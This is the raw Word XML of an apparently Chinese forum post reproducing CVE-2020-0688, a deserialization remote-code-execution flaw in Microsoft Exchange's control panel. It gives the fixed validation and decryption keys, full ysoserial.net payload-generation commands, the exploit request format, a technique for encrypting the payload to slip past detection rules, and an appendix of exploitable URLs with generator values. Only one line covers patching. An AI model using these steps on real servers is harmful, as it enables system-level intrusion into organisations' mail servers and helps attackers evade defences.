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526" w:afterAutospacing="0" w:line="690" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CVE-2020-0688 Exchange RCE漏洞复现与高级利用方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="444444"/>
        <w:spacing w:line="600" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial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shd w:val="clear" w:fill="444444"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>2020-02-27 18:44:32</w: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instrText xml:space="preserve"> HYPERLINK "https://www.t00ls.net/articles-55141.html" \l "comments" \t "https://www.t00ls.net/_blank" </w:instrTex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FFFFFF"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="444444"/>
        </w:rPr>
        <w:t>6</w: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instrText xml:space="preserve"> HYPERLINK "https://www.t00ls.net/members-profile-13078.html" \o "3t2ugg1e" \t "https://www.t00ls.net/_blank" </w:instrTex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caps w:val="0"/>
          <w:color w:val="FFFFFF"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="444444"/>
        </w:rPr>
        <w:t>3t2ugg1e</w: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shd w:val="clear" w:fill="444444"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>310</w: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instrText xml:space="preserve"> HYPERLINK "https://www.t00ls.net/javascript:void(0);" </w:instrText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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="FFFFFF"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="44444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written by 3t2ugg1e 2020年2月27日 16：42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EAECEF" w:sz="6" w:space="3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42"/>
          <w:szCs w:val="42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42"/>
          <w:szCs w:val="42"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0x01 漏洞描述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该漏洞是在Exchange Control Panel （ECP）组件中发现的。这个漏洞的性质非常简单。与每次软件安装都会产生随机密钥不同，所有Microsoft Exchange Server在安装后的web.config文件中都拥有相同的validationKey和decryptionKey。这些密钥用于保证ViewState的安全性。而ViewState是ASP.NET Web应用以序列化格式存储在客户机上的服务端数据。客户端通过__VIEWSTATE请求参数将这些数据返回给服务器。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2915900" cy="6562725"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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由于使用了静态密钥，经过身份验证的攻击者可以欺骗目标服务器反序列化恶意创建的ViewState数据。在YSoSerial.net的帮助下，攻击者可以在Exchange Control Panel web应用上执行任意.net代码。 为了利用这个漏洞，我们需要从经过身份验证的session中收集ViewStateUserKey和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI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VIEWSTATEGENERATOR值。ViewStateUserKey可以从ASP.NET的cookie中获取，而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VIEWSTATEGENERATOR可以在一个隐藏字段中找到。所有这些都可以通过浏览器中的工具轻松找到。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参考链接：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452" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast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466" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:left="720" w:right="0"/>
      </w:pP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instrText xml:space="preserve"> HYPERLINK "https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys" \t "https://www.t00ls.net/_blank" </w:instrTex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t>https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys</w: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452" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:left="1440" w:hanging="36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452" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast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466" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:left="720" w:right="0"/>
      </w:pP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instrText xml:space="preserve"> HYPERLINK "https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/" \t "https://www.t00ls.net/_blank" </w:instrTex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t>https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/</w: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452" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:left="1440" w:hanging="36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EAECEF" w:sz="6" w:space="3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42"/>
          <w:szCs w:val="42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42"/>
          <w:szCs w:val="42"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0x02 影响范围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Microsoft Exchange Server 2010 Service Pack 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Microsoft Exchange Server 2013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Microsoft Exchange Server 2016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Microsoft Exchange Server 2019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Style w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI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注意：Exchange Server 2010默认使用.net v2.0，而ysoserial.net-V2版没有ViewState插件，漏洞利用有一定难度。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EAECEF" w:sz="6" w:space="3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42"/>
          <w:szCs w:val="42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42"/>
          <w:szCs w:val="42"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0x03 漏洞利用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复现环境： Windows Server 2012R2 Exchange Server 2016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普通域用户： nsfocus\liuruo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想要成功利用漏洞共需4个关键参数：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validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF （默认不变）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validationalg = SHA1 （默认不变）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__VIEWSTATEGENERATOR （从返回包中提取）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53" w:beforeAutospacing="0" w:after="226" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:left="720" w:hanging="36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1"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ASP.NET_SessionId （从Cookie中提取）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26"/>
          <w:szCs w:val="26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26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>基础利用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在Web.config路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/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C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\ecp\web.config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，可获得前两个关键参数，这两个参数是全版本不变的。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466" w:afterAutospacing="0" w:line="22" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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0"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="23241F"/>
        </w:rPr>
        <w:t>validationkey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= CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF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0"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="23241F"/>
        </w:rPr>
        <w:t>validationalg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= SHA1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然后使用普通域用户liuruo访问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/ecp/default.aspx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，从返回包中获得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__VIEWSTATEGENERATOR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参数。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725025" cy="5238750"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="2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250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从cookie中获得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ASP.NET_SessionId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。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934075" cy="2705100"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="3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使用ysoserial.net工具生成反序列化payload。 工具下载地址： </w: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4"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/pwntester/ysoserial.net/" \t "https://www.t00ls.net/_blank" </w:instrTex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0"/>
          <w:rFonts w:hint="default" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="F85050"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>https://github.com/pwntester/ysoserial.net/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="F8505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 生成payload命令：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466" w:afterAutospacing="0" w:line="22" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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ysoserial.exe -p ViewState -g TextFormattingRunProperties -c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"calc.exe"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--validationalg=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"SHA1"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--validationkey=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"CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"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--generator=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"B97B4E27"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--viewstateuserkey=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"2fdc8b0d-dcfb-4d0a-b464-95b9a2dcc968"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--isdebug –-islegacy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401175" cy="3095625"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="4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构造以下URL，使用生成的payload替换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&lt;ViewState&gt;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，以GET请求发送给服务器即可。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466" w:afterAutospacing="0" w:line="22" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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https://ip:port/ecp/default.aspx?__VIEWSTATEGENERATOR=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0"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="23241F"/>
        </w:rPr>
        <w:t>&lt;generator&gt;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&amp;__VIEWSTATE=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0"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="23241F"/>
        </w:rPr>
        <w:t>&lt;ViewState&gt;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Style w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>注意：使用Burpsuite对payload进行关键字符URL编码，而不是全部URL编码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115300" cy="3171825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="6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虽然服务器返回500错误，但是攻击已经成功，可见w3wp.exe下存在以system权限运行的calc.exe。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8573750" cy="13163550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5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0" cy="1316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26"/>
          <w:szCs w:val="26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26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>高级利用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18"/>
          <w:szCs w:val="18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18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>更改请求URL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从基础利用中可知，需要访问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/ecp/default.aspx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并获得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__VIEWSTATEGENERATOR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参数。经过测试，并非所有版本Exchange Server都会返回该参数，但即使不返回该参数值，也是可以使用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__VIEWSTATEGENERATOR=B97B4E27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生成payload完成攻击。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大量测试后发现，几乎每一个.aspx后缀的URL都有一个对应的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__VIEWSTATEGENERATOR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参数值，并且.slab后缀的URL也可以触发漏洞。经过测试后可利用的URL在本文最后附录中列出。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当然ysoserial.net工具提供了path和apppath参数，供使用者在未知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__VIEWSTATEGENERATOR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参数的情况下，设置攻击路径。但是笔者在测试的时候，并没有搞明白该怎么使用这两个参数，所以略过了，懂C#的大牛可以指点一下。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18"/>
          <w:szCs w:val="18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18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>加密__VIEWSTATE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使用ysoserial.net生成大量payload就可以发现，payload的前几个字节存在固定特征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\wEy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，防护设备可以很轻易的识别到。但经过查阅相关知识后发现，当服务使用.NET Framework 4.0及更低版本（在v2.0到v4.0上测试）时，若我们已知验证密钥及其算法，那么我们可以在请求中添加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__VIEWSTATEENCRYPTED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 参数（空值即可），来对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/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FFFFF"/>
        </w:rPr>
        <w:t>__VIEWSTATE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参数进行加密，以绕过简单的防护规则。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从最开始的Web.config文件中，我们不仅获得了validationKey和validation，还获得了decryptionKey和decryption。所以我们可以使用ysoserial.net的isencrypted参数生成加密的payload：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466" w:afterAutospacing="0" w:line="22" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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.\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c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"calc.exe"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--validationalg=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"SHA1"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--decryptionalg=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"3DES"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--validationkey=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"CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"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--decryptionkey=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"E9D2490BD0075B51D1BA5288514514AF"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--generator=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"B97B4E27"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--viewstateuserkey=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0"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="23241F"/>
        </w:rPr>
        <w:t>"df0c4af4-8be5-4000-a15b-abf2066186dd"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--isencrypted -–islegacy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发送加密后的攻击请求数据包即可完成攻击。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466" w:afterAutospacing="0" w:line="22" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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0"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="23241F"/>
        </w:rPr>
        <w:t>default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.aspx?__VIEWSTATEENCRYPTED=&amp;__VIEWSTATE=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0"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="23241F"/>
        </w:rPr>
        <w:t>&lt;payload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:pBdr>
          <w:top w:val="single" w:color="EEEEEE" w:sz="2" w:space="7"/>
          <w:left w:val="single" w:color="EEEEEE" w:sz="2" w:space="7"/>
          <w:bottom w:val="single" w:color="EEEEEE" w:sz="2" w:space="7"/>
          <w:right w:val="single" w:color="EEEEEE" w:sz="2" w:space="7"/>
        </w:pBdr>
        <w:shd w:val="clear" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0" w:line="23" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center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0366D6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34525" cy="4000500"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="7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EAECEF" w:sz="6" w:space="3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42"/>
          <w:szCs w:val="42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42"/>
          <w:szCs w:val="42"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0x04 漏洞防护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微软官方已针对受支持的产品版本发布了修复该漏洞的安全补丁，建议受影响用户开启系统自动更新安装补丁进行防护。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EAECEF" w:sz="6" w:space="3"/>
        </w:pBdr>
        <w:spacing w:after="466" w:afterAutospacing="0" w:line="19" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="222222"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>附录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466" w:afterAutospacing="0" w:line="23" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0"/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经过简单测试，已知可利用路径：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/ecp/default.aspx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__VIEWSTATEGENERATOR=B97B4E27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/ecp/PersonalSettings/HomePage.aspx?showhelp=false&amp;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__VIEWSTATEGENERATOR=1D01FD4E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/ecp/PersonalSettings/HomePage.aspx?showhelp=false&amp;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__VIEWSTATEGENERATOR=1D01FD4E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/ecp/Organize/AutomaticReplies.slab?showhelp=false&amp;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__VIEWSTATEGENERATOR=FD338EE0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/ecp/RulesEditor/InboxRules.slab?showhelp=false&amp;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__VIEWSTATEGENERATOR=FD338EE0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/ecp/Organize/DeliveryReports.slab?showhelp=false&amp;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__VIEWSTATEGENERATOR=FD338EE0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/ecp/MyGroups/PersonalGroups.aspx?showhelp=false&amp;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__VIEWSTATEGENERATOR=A767F62B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/ecp/MyGroups/ViewDistributionGroup.aspx?pwmcid=1&amp;id=38f4bec5-704f-4272-a654-95d53150e2ae&amp;ReturnObjectType=1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__VIEWSTATEGENERATOR=321473B8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/ecp/Customize/Messaging.aspx?showhelp=false&amp;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__VIEWSTATEGENERATOR=9C5731F0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/ecp/Customize/General.aspx?showhelp=false&amp;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__VIEWSTATEGENERATOR=72B13321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/ecp/Customize/Calendar.aspx?showhelp=false&amp;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__VIEWSTATEGENERATOR=4AD51055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/ecp/Customize/SentItems.aspx?showhelp=false&amp;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 xml:space="preserve"> __VIEWSTATEGENERATOR=4466B13F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/ecp/PersonalSettings/Password.aspx?showhelp=false&amp;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__VIEWSTATEGENERATOR=59543DCA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/ecp/SMS/TextMessaging.slab?showhelp=false&amp;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__VIEWSTATEGENERATOR=FD338EE0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/ecp/TroubleShooting/MobileDevices.slab?showhelp=false&amp;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__VIEWSTATEGENERATOR=FD338EE0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/ecp/Customize/Regional.aspx?showhelp=false&amp;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__VIEWSTATEGENERATOR=9097CD08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/ecp/MyGroups/SearchAllGroups.slab?pwmcid=3&amp;ReturnObjectType=1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__VIEWSTATEGENERATOR=FD338EE0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/ecp/Security/BlockOrAllow.aspx?showhelp=false&amp;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:pBdr>
          <w:top w:val="single" w:color="EEEEEE" w:sz="6" w:space="12"/>
          <w:left w:val="single" w:color="EEEEEE" w:sz="6" w:space="12"/>
          <w:bottom w:val="single" w:color="EEEEEE" w:sz="6" w:space="12"/>
          <w:right w:val="single" w:color="EEEEEE" w:sz="6" w:space="12"/>
        </w:pBdr>
        <w:shd w:val="clear" w:fill="23241F"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="226" w:afterAutospacing="0" w:line="22" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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FFFFFF"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="23241F"/>
        </w:rPr>
        <w:t>__VIEWSTATEGENERATOR=362253EF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7A997E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D17A997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260AF455"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="260AF4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7C11983C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7C1198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56390"/>
    <w:rsid w:val="3655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t00ls.net/attachments/month_2002/200227184162c5f511a814776d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t00ls.net/attachments/month_2002/200227184089263a6534b0f727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www.t00ls.net/attachments/month_2002/2002271836be67f7b658287a8a.png" TargetMode="External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hyperlink" Target="https://www.t00ls.net/attachments/month_2002/2002271842e1d7c2406ff19db6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t00ls.net/attachments/month_2002/2002271842694b6ee8e1c40a0c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t00ls.net/attachments/month_2002/2002271842c0f4d99d210aa8a7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t00ls.net/attachments/month_2002/2002271841b67024a9ab7b5dd1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2020-02-28T02:53:00Z</dcterms:created>
  <dc:creator>0</dc:creator>
  <cp:lastModifiedBy>0</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-02-28T02:54:07Z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